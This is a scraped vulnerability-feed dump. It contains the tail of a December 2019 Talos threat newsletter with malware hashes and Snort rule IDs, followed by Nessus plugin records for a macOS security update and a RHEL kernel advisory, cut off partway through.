President Donald Trump says he [discussed election security](<https://www.reuters.com/article/us-usa-russia/arms-control-election-security-could-come-up-at-trump-lavrov-meeting-white-house-idUSKBN1YE23L?il=0>) with Russian officials during a private meeting this week. Russian Foreign Minister Sergei Lavrov said in a press conference after the meeting that Russia has wanted to publish information that would allegedly clear it of any wrongdoing during the 2016 U.S. presidential election, but the U.S. has blocked that release. \n * Apple released the newest version of iOS this week, which [provides new security features](<https://www.forbes.com/sites/davidphelan/2019/12/10/apple-releases-ios-133-brand-new-features-vital-bug-fixes-and-security-patches/#5dffa21075dd>) for Safari. The mobile version of the web browser now supports NFC, USB and Lightning-compliant keys so users don\u2019t have to rely only on passwords. \n * A new feature in Google Chrome will [alert users if their login credentials](<https://www.techradar.com/news/google-chrome-can-now-check-if-your-passwords-have-been-stolen-heres-how>) were exposed in a data breach. Each time the user logs into a site using the browser, it will check those credentials against a database of known leaked information.\n\n### Notable recent security issues\n\n**Title: **[Microsoft discloses two critical bugs as part of monthly security update](<https://blog.talosintelligence.com/2019/12/microsoft-patch-tuesday-dec-2019.html>) \n**Description: **Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 25 vulnerabilities, two of which are considered critical. This month\u2019s security update covers security issues in a variety of Microsoft services and software, including Remote Desktop Protocol, Hyper-V and multiple Microsoft Office products. 
\n**Snort SIDs: **52402, 52403, 52410, 52411, 52419, 52420 \n** \n****Title: **[AMD ATI Radeon ATIDXX64.DLL shader functionality sincos denial-of-service vulnerability](<https://blog.talosintelligence.com/2019/12/vuln-spotlight-amd-radeon-550-DoS-VM-dec-2019.html>) \n**Description: **Cisco Talos recently discovered a denial-of-service vulnerability in a specific DLL inside of the AMD ATI Radeon line of video cards. This vulnerability can be triggered by supplying a malformed pixel shader inside a VMware guest operating system. Such an attack can be triggered from VMware guest usermode to cause an out-of-bounds memory read on vmware-vmx.exe process on host, or theoretically through WEBGL. \n**Snort SIDs: **51461, 51462 (By Tim Muniz) \n\n\n### Most prevalent malware files this week\n\n**SHA 256: **[64f3633e009650708c070751bd7c7c28cd127b7a65d4ab4907dbe8ddaa01ec8b](<https://www.virustotal.com/gui/file/64f3633e009650708c070751bd7c7c28cd127b7a65d4ab4907dbe8ddaa01ec8b/details>) \n**MD5: **42143a53581e0304b08f61c2ef8032d7 \n**Typical Filename: **myfile.exe \n**Claimed Product: **N/A \n**Detection Name: **Pdf.Phishing.Phishing::malicious.tht.talos \n** \n****SHA 256: **[f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc](<https://www.virustotal.com/gui/file/f917be677daab5ee91dd3e9ec3f8fd027a58371524f46dd314a13aefc78b2ddc/details>) \n**MD5: **c5608e40f6f47ad84e2985804957c342 \n**Typical Filename: **FlashHelperServices.exe \n**Claimed Product: **Flash Helper Service \n**Detection Name:** PUA:2144FlashPlayer-tpd \n** \n****SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n** \n****SHA 256: 
**[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5: **e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin** ** \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/gui/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5: **799b30f47060ca05d80ece53866e01cc \n**Typical Filename: **mf2016341595.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.Generic:Gen.22fz.1201 \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2019-12-12T11:00:01", "published": "2019-12-12T11:00:01", "id": "TALOSBLOG:6DED316F2A69ED503F8D797997ECBE1E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DerWtWsHX8g/threat-source-newsletter-dec-12-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Dec. 
12, 2019)", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2019-12-13T07:52:24", "bulletinFamily": "scanner", "description": "The remote host is running a version of macOS / Mac OS X that is 10.13.x prior\nto 10.13.6 Security Update 2019-007, 10.14.x prior to 10.14.6 Security Update\n2019-002, or 10.15.x prior to 10.15.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - slapd in OpenLDAP before 2.4.30 allows remote attackers\n to cause a denial of service (assertion failure and\n daemon exit) via an LDAP search query with attrsOnly set\n to true, which causes empty attributes to be returned.\n (CVE-2012-1164)\n\n - libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31\n and earlier, when using the Mozilla NSS backend, always\n uses the default cipher suite even when TLSCipherSuite\n is set, which might cause OpenLDAP to use weaker ciphers\n than intended and make it easier for remote attackers to\n obtain sensitive information. (CVE-2012-2668)\n\n - The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier\n does not properly count references, which allows remote\n attackers to cause a denial of service (slapd crash) by\n unbinding immediately after a search request, which\n triggers rwm_conn_destroy to free the session context\n while it is being used by rwm_op_search. (CVE-2013-4449)\n\n - The deref_parseCtrl function in\n servers/slapd/overlays/deref.c in OpenLDAP 2.4.13\n through 2.4.40 allows remote attackers to cause a denial\n of service (NULL pointer dereference and crash) via an\n empty attribute list in a deref control in a search\n request. (CVE-2015-1545)\n\n - tcpdump before 4.9.3 has a heap-based buffer over-read\n related to aoe_print in print-aoe.c and lookup_emem in\n addrtoname.c. (CVE-2017-16808)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 1 of 2). (CVE-2018-10103)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 2 of 2). 
(CVE-2018-10105)\n\n - The LDP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ldp.c:ldp_tlv_print().\n (CVE-2018-14461)\n\n - The ICMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp.c:icmp_print(). (CVE-2018-14462)\n\n - The VRRP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-vrrp.c:vrrp_print(). (CVE-2018-14463)\n\n - The LMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-lmp.c:lmp_print_data_link_subobjs().\n (CVE-2018-14464)\n\n - The RSVP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-rsvp.c:rsvp_obj_print().\n (CVE-2018-14465)\n\n - The Rx parser in tcpdump before 4.9.3 has a buffer over-\n read in print-rx.c:rx_cache_find() and\n rx_cache_insert(). (CVE-2018-14466)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_MP). (CVE-2018-14467)\n\n - The FRF.16 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-fr.c:mfr_print(). (CVE-2018-14468)\n\n - The IKEv1 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-isakmp.c:ikev1_n_print().\n (CVE-2018-14469)\n\n - The Babel parser in tcpdump before 4.9.3 has a buffer\n over-read in print-babel.c:babel_print_v2().\n (CVE-2018-14470)\n\n - The command-line argument parser in tcpdump before 4.9.3\n has a buffer overflow in tcpdump.c:get_next_file().\n (CVE-2018-14879)\n\n - The OSPFv3 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ospf6.c:ospf6_print_lshdr().\n (CVE-2018-14880)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_RESTART). (CVE-2018-14881)\n\n - The ICMPv6 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp6.c. (CVE-2018-14882)\n\n - The IEEE 802.11 parser in tcpdump before 4.9.3 has a\n buffer over-read in print-802_11.c for the Mesh Flags\n subfield. 
(CVE-2018-16227)\n\n - The HNCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-hncp.c:print_prefix().\n (CVE-2018-16228)\n\n - The DCCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-dccp.c:dccp_print_option().\n (CVE-2018-16229)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_attr_print()\n (MP_REACH_NLRI). (CVE-2018-16230)\n\n - The BGP parser in tcpdump before 4.9.3 allows stack\n consumption in print-bgp.c:bgp_attr_print() because of\n unlimited recursion. (CVE-2018-16300)\n\n - libpcap before 1.9.1, as used in tcpdump before 4.9.3,\n has a buffer overflow and/or over-read because of errors\n in pcapng reading. (CVE-2018-16301)\n\n - The SMB parser in tcpdump before 4.9.3 has buffer over-\n reads in print-smb.c:print_trans() for \\MAILSLOT\\BROWSE\n and \\PIPE\\LANMAN. (CVE-2018-16451)\n\n - The SMB parser in tcpdump before 4.9.3 has stack\n exhaustion in smbutil.c:smb_fdata() via recursion.\n (CVE-2018-16452)\n\n - An issue was discovered in the server in OpenLDAP before\n 2.4.48. When the server administrator delegates rootDN\n (database admin) privileges for certain databases but\n wants to maintain isolation (e.g., for multi-tenant\n deployments), slapd does not properly stop a rootDN from\n requesting authorization as an identity from another\n database during a SASL bind or with a proxyAuthz (RFC\n 4370) control. (It is not a common configuration to\n deploy a system where the server administrator and a DB\n administrator enjoy different levels of trust.)\n (CVE-2019-13057)\n\n - An issue was discovered in OpenLDAP 2.x before 2.4.48.\n When using SASL authentication and session encryption,\n and relying on the SASL security layers in slapd access\n controls, it is possible to obtain access that would\n otherwise be denied via a simple bind for any identity\n covered in those ACLs. 
After the first SASL bind is\n completed, the sasl_ssf value is retained for all new\n non-SASL connections. Depending on the ACL\n configuration, this can affect different types of\n operations (searches, modifications, etc.). In other\n words, a successful authorization step completed by one\n user affects the authorization requirement for a\n different user. (CVE-2019-13565)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 mishandles\n certain length values because of reuse of a variable.\n This may open up an attack vector involving extra data\n at the end of a request. (CVE-2019-15161)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 on non-Windows\n platforms provides details about why authentication\n failed, which might make it easier for attackers to\n enumerate valid usernames. (CVE-2019-15162)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows attackers\n to cause a denial of service (NULL pointer dereference\n and daemon crash) if a crypt() call fails.\n (CVE-2019-15163)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows SSRF\n because a URL may be provided as a capture source.\n (CVE-2019-15164)\n\n - sf-pcapng.c in libpcap before 1.9.1 does not properly\n validate the PHB header length before allocating memory.\n (CVE-2019-15165)\n\n - lmp_print_data_link_subobjs() in print-lmp.c in tcpdump\n before 4.9.3 lacks certain bounds checks.\n (CVE-2019-15166)\n\n - In libexpat before 2.2.8, crafted XML input could fool\n the parser into changing from DTD parsing to document\n parsing too early; a consecutive call to\n XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber)\n then resulted in a heap-based buffer over-read.\n (CVE-2019-15903)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "MACOS_HT210788.NASL", "href": "https://www.tenable.com/plugins/nessus/131957", "title": "macOS 10.15.x < 10.15.2 / 10.14.x < 10.14.6 Security 
Update 2019-002 / 10.13.x < 10.13.6 Security Update 2019-007", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131957);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\n \"CVE-2012-1164\",\n \"CVE-2012-2668\",\n \"CVE-2013-4449\",\n \"CVE-2015-1545\",\n \"CVE-2017-16808\",\n \"CVE-2018-10103\",\n \"CVE-2018-10105\",\n \"CVE-2018-14461\",\n \"CVE-2018-14462\",\n \"CVE-2018-14463\",\n \"CVE-2018-14464\",\n \"CVE-2018-14465\",\n \"CVE-2018-14466\",\n \"CVE-2018-14467\",\n \"CVE-2018-14468\",\n \"CVE-2018-14469\",\n \"CVE-2018-14470\",\n \"CVE-2018-14879\",\n \"CVE-2018-14880\",\n \"CVE-2018-14881\",\n \"CVE-2018-14882\",\n \"CVE-2018-16227\",\n \"CVE-2018-16228\",\n \"CVE-2018-16229\",\n \"CVE-2018-16230\",\n \"CVE-2018-16300\",\n \"CVE-2018-16301\",\n \"CVE-2018-16451\",\n \"CVE-2018-16452\",\n \"CVE-2019-13057\",\n \"CVE-2019-13565\",\n \"CVE-2019-15161\",\n \"CVE-2019-15162\",\n \"CVE-2019-15163\",\n \"CVE-2019-15164\",\n \"CVE-2019-15165\",\n \"CVE-2019-15166\",\n \"CVE-2019-15167\",\n \"CVE-2019-15903\",\n \"CVE-2019-8828\",\n \"CVE-2019-8830\",\n \"CVE-2019-8832\",\n \"CVE-2019-8833\",\n \"CVE-2019-8837\",\n \"CVE-2019-8838\",\n \"CVE-2019-8839\",\n \"CVE-2019-8842\",\n \"CVE-2019-8847\",\n \"CVE-2019-8848\",\n \"CVE-2019-8852\",\n \"CVE-2019-8853\",\n \"CVE-2019-8856\"\n );\n script_bugtraq_id(\n 52404,\n 53823,\n 63190,\n 72519\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210788\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-12-06\");\n\n script_name(english:\"macOS 10.15.x < 10.15.2 / 10.14.x < 10.14.6 Security Update 2019-002 / 10.13.x < 10.13.6 Security Update 2019-007\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / 
Mac OS X that is 10.13.x prior\nto 10.13.6 Security Update 2019-007, 10.14.x prior to 10.14.6 Security Update\n2019-002, or 10.15.x prior to 10.15.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - slapd in OpenLDAP before 2.4.30 allows remote attackers\n to cause a denial of service (assertion failure and\n daemon exit) via an LDAP search query with attrsOnly set\n to true, which causes empty attributes to be returned.\n (CVE-2012-1164)\n\n - libraries/libldap/tls_m.c in OpenLDAP, possibly 2.4.31\n and earlier, when using the Mozilla NSS backend, always\n uses the default cipher suite even when TLSCipherSuite\n is set, which might cause OpenLDAP to use weaker ciphers\n than intended and make it easier for remote attackers to\n obtain sensitive information. (CVE-2012-2668)\n\n - The rwm overlay in OpenLDAP 2.4.23, 2.4.36, and earlier\n does not properly count references, which allows remote\n attackers to cause a denial of service (slapd crash) by\n unbinding immediately after a search request, which\n triggers rwm_conn_destroy to free the session context\n while it is being used by rwm_op_search. (CVE-2013-4449)\n\n - The deref_parseCtrl function in\n servers/slapd/overlays/deref.c in OpenLDAP 2.4.13\n through 2.4.40 allows remote attackers to cause a denial\n of service (NULL pointer dereference and crash) via an\n empty attribute list in a deref control in a search\n request. (CVE-2015-1545)\n\n - tcpdump before 4.9.3 has a heap-based buffer over-read\n related to aoe_print in print-aoe.c and lookup_emem in\n addrtoname.c. (CVE-2017-16808)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 1 of 2). (CVE-2018-10103)\n\n - tcpdump before 4.9.3 mishandles the printing of SMB data\n (issue 2 of 2). 
(CVE-2018-10105)\n\n - The LDP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ldp.c:ldp_tlv_print().\n (CVE-2018-14461)\n\n - The ICMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp.c:icmp_print(). (CVE-2018-14462)\n\n - The VRRP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-vrrp.c:vrrp_print(). (CVE-2018-14463)\n\n - The LMP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-lmp.c:lmp_print_data_link_subobjs().\n (CVE-2018-14464)\n\n - The RSVP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-rsvp.c:rsvp_obj_print().\n (CVE-2018-14465)\n\n - The Rx parser in tcpdump before 4.9.3 has a buffer over-\n read in print-rx.c:rx_cache_find() and\n rx_cache_insert(). (CVE-2018-14466)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_MP). (CVE-2018-14467)\n\n - The FRF.16 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-fr.c:mfr_print(). (CVE-2018-14468)\n\n - The IKEv1 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-isakmp.c:ikev1_n_print().\n (CVE-2018-14469)\n\n - The Babel parser in tcpdump before 4.9.3 has a buffer\n over-read in print-babel.c:babel_print_v2().\n (CVE-2018-14470)\n\n - The command-line argument parser in tcpdump before 4.9.3\n has a buffer overflow in tcpdump.c:get_next_file().\n (CVE-2018-14879)\n\n - The OSPFv3 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-ospf6.c:ospf6_print_lshdr().\n (CVE-2018-14880)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_capabilities_print()\n (BGP_CAPCODE_RESTART). (CVE-2018-14881)\n\n - The ICMPv6 parser in tcpdump before 4.9.3 has a buffer\n over-read in print-icmp6.c. (CVE-2018-14882)\n\n - The IEEE 802.11 parser in tcpdump before 4.9.3 has a\n buffer over-read in print-802_11.c for the Mesh Flags\n subfield. 
(CVE-2018-16227)\n\n - The HNCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-hncp.c:print_prefix().\n (CVE-2018-16228)\n\n - The DCCP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-dccp.c:dccp_print_option().\n (CVE-2018-16229)\n\n - The BGP parser in tcpdump before 4.9.3 has a buffer\n over-read in print-bgp.c:bgp_attr_print()\n (MP_REACH_NLRI). (CVE-2018-16230)\n\n - The BGP parser in tcpdump before 4.9.3 allows stack\n consumption in print-bgp.c:bgp_attr_print() because of\n unlimited recursion. (CVE-2018-16300)\n\n - libpcap before 1.9.1, as used in tcpdump before 4.9.3,\n has a buffer overflow and/or over-read because of errors\n in pcapng reading. (CVE-2018-16301)\n\n - The SMB parser in tcpdump before 4.9.3 has buffer over-\n reads in print-smb.c:print_trans() for \\MAILSLOT\\BROWSE\n and \\PIPE\\LANMAN. (CVE-2018-16451)\n\n - The SMB parser in tcpdump before 4.9.3 has stack\n exhaustion in smbutil.c:smb_fdata() via recursion.\n (CVE-2018-16452)\n\n - An issue was discovered in the server in OpenLDAP before\n 2.4.48. When the server administrator delegates rootDN\n (database admin) privileges for certain databases but\n wants to maintain isolation (e.g., for multi-tenant\n deployments), slapd does not properly stop a rootDN from\n requesting authorization as an identity from another\n database during a SASL bind or with a proxyAuthz (RFC\n 4370) control. (It is not a common configuration to\n deploy a system where the server administrator and a DB\n administrator enjoy different levels of trust.)\n (CVE-2019-13057)\n\n - An issue was discovered in OpenLDAP 2.x before 2.4.48.\n When using SASL authentication and session encryption,\n and relying on the SASL security layers in slapd access\n controls, it is possible to obtain access that would\n otherwise be denied via a simple bind for any identity\n covered in those ACLs. 
After the first SASL bind is\n completed, the sasl_ssf value is retained for all new\n non-SASL connections. Depending on the ACL\n configuration, this can affect different types of\n operations (searches, modifications, etc.). In other\n words, a successful authorization step completed by one\n user affects the authorization requirement for a\n different user. (CVE-2019-13565)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 mishandles\n certain length values because of reuse of a variable.\n This may open up an attack vector involving extra data\n at the end of a request. (CVE-2019-15161)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 on non-Windows\n platforms provides details about why authentication\n failed, which might make it easier for attackers to\n enumerate valid usernames. (CVE-2019-15162)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows attackers\n to cause a denial of service (NULL pointer dereference\n and daemon crash) if a crypt() call fails.\n (CVE-2019-15163)\n\n - rpcapd/daemon.c in libpcap before 1.9.1 allows SSRF\n because a URL may be provided as a capture source.\n (CVE-2019-15164)\n\n - sf-pcapng.c in libpcap before 1.9.1 does not properly\n validate the PHB header length before allocating memory.\n (CVE-2019-15165)\n\n - lmp_print_data_link_subobjs() in print-lmp.c in tcpdump\n before 4.9.3 lacks certain bounds checks.\n (CVE-2019-15166)\n\n - In libexpat before 2.2.8, crafted XML input could fool\n the parser into changing from DTD parsing to document\n parsing too early; a consecutive call to\n XML_GetCurrentLineNumber (or XML_GetCurrentColumnNumber)\n then resulted in a heap-based buffer over-read.\n (CVE-2019-15903)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported\nversion number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210788\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS 10.15.2 / 
10.14.x < 10.14.6 Security Update 2019-002 / 10.13.x < 10.13.6 Security Update 2019-007 or\nlater\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8852\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::apple::macos::get_app_info();\n\nconstraints = [\n { 'min_version' : '10.15', 'fixed_version' : '10.15.2' },\n { 'min_version' : '10.13', 'max_version' : '10.13.6', 'fixed_build': '17G10021', 'fixed_display' : '10.13.6 Security Update 2019-007' },\n { 'min_version' : '10.14', 'max_version' : '10.14.6', 'fixed_build': '18G2022', 'fixed_display' : '10.14.6 Security Update 2019-002' }\n];\nvcf::apple::macos::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-13T09:12:28", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.6\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results\n(CVE-2019-9500)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [HPEMC 7.7 BUG] Protect against concurrent calls into UV BIOS\n(BZ#1720367)\n\n* A cluster node has multiple hung ", "modified": "2019-12-02T00:00:00", "published": "2019-12-12T00:00:00", "id": "REDHAT-RHSA-2019-4168.NASL", "href": "https://www.tenable.com/plugins/nessus/131982", "title": "RHEL 7 : kernel (RHSA-2019:4168)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:4168. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(131982);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/12/12\");\n\n script_cve_id(\"CVE-2019-9500\");\n script_xref(name:\"RHSA\", value:\"2019:4168\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2019:4168)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.6\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* kernel: brcmfmac heap buffer overflow in brcmf_wowl_nd_results\n(CVE-2019-9500)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* [HPEMC 7.7 BUG] Protect against concurrent calls into UV BIOS\n(BZ#1720367)\n\n* A cluster node has multiple hung 'mv' processes that are accessing a\ngfs2 filesystem. (BZ#1721911)\n\n* alua messages flooding serial console leading to cluster failover\ndelays (BZ#1754849)\n\n* kernel build: parallelize redhat/mod-sign.sh (BZ#1755329)\n\n* kernel build: speed up module compression step (BZ#1755338)\n\n* Nested VirtualBox VMs on Windows guest has the potential of\nimpacting memory region allocated to other KVM guests (BZ#1755782)\n\n* [Intel 7.8 Bug] [KVM][CLX] CPUID_7_0_EDX_ARCH_CAPABILITIES is not\nenabled in VM. (BZ#1757756)\n\n* OS getting restarted because of driver issue with QLogic Corp.\nISP2532-based 8Gb Fibre Channel to PCI Express HBA [1077:2532] (rev\n02). 
(BZ#1759446)\n\n* patchset for x86/atomic: Fix smp_mb__{before,after}_atomic()\n(BZ#1772810)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:4168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-9500\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bpftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n 
